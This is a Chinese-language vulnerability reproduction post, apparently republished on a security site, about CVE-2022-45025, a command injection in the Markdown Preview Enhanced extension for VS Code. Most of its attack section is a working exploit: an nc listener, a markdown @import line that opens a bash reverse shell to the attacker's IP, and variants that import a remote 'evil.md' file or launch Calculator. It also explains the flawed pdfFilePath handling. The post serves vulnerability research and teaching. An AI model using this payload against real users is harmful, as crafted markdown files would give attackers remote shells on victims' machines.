【漏洞复现】利用Vscode插件漏洞反弹shell(cve-2022-45025)

admin 2022年12月11日20:21:42评论426 views字数 1114阅读3分42秒阅读模式

前言

昨天乌克兰安全研究员Yurii Sanin公开了漏洞CVE-2022-45025的漏洞细节,这里来个简单的复现。该漏洞是利用了VScode/AtomMarkdown Preview Enhanced for VSCode插件中的代码漏洞从而实现命令注入。

希望大家给个关注+点赞+在看!我不胜感激!加我微信W01fh4cker,拉交流群~

【漏洞复现】利用Vscode插件漏洞反弹shell(cve-2022-45025)

复现步骤

本文以Ubuntu为靶机,Kali为攻击机进行演示。UbuntuIP192.168.3.6KaliIP192.168.3.16

现在Kali中关闭防火墙并启动nc监听:

sudo ufw disable
nc -nlvp 9999

然后在Ubuntu上执行如下命令:

sudo ufw disable
touch test.md

然后用VScode打开该markdown文件,并确保VScode上面安装了Markdown Preview Enhanced for VSCode插件,如下图所示:

【漏洞复现】利用Vscode插件漏洞反弹shell(cve-2022-45025)

然后我们在test.md中输入以下内容:

<!-- @import "$(bash -c 'bash -i >& /dev/tcp/192.168.3.16/9999 0>&1'| exit 0) new.pdf"-->
# W01fh4cker hhh

保存之后,点击右上角的第一个图标,也就是预览功能:

【漏洞复现】利用Vscode插件漏洞反弹shell(cve-2022-45025)

此时回到kali中,即可看到反弹shell成功:

【漏洞复现】利用Vscode插件漏洞反弹shell(cve-2022-45025)

拓展

除了以上这些操作以外,我们也可以导入外部资源:

<!-- @import "https://www.test.com/evil.md" -->
# W01fh4cker hhh

如果是Mac的话,还可以打开计算器:

<!-- @import "$(open -a Calculator > /dev/null | exit 0)hello.pdf" -->

漏洞代码来源

出问题的代码在这里:

https://github.com/shd101wyy/mume/blob/7135d7606a6a57de6e2372c26a2f16bb98ecf2b2/src/pdf.ts

【漏洞复现】利用Vscode插件漏洞反弹shell(cve-2022-45025)

由于没有对pdfFilePath参数的输入内容进行控制,因此我们传入恶意命令,参数拼接起来加上开启了 { shell: true },从而导致了命令执行漏洞的产生。

参考资料

https://xz.aliyun.com/t/11791

https://github.com/yuriisanin/CVE-2022-45025


原文始发于微信公众号(追梦信安):【漏洞复现】利用Vscode插件漏洞反弹shell(cve-2022-45025)

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年12月11日20:21:42
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞复现】利用Vscode插件漏洞反弹shell(cve-2022-45025)https://cn-sec.com/archives/1457543.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息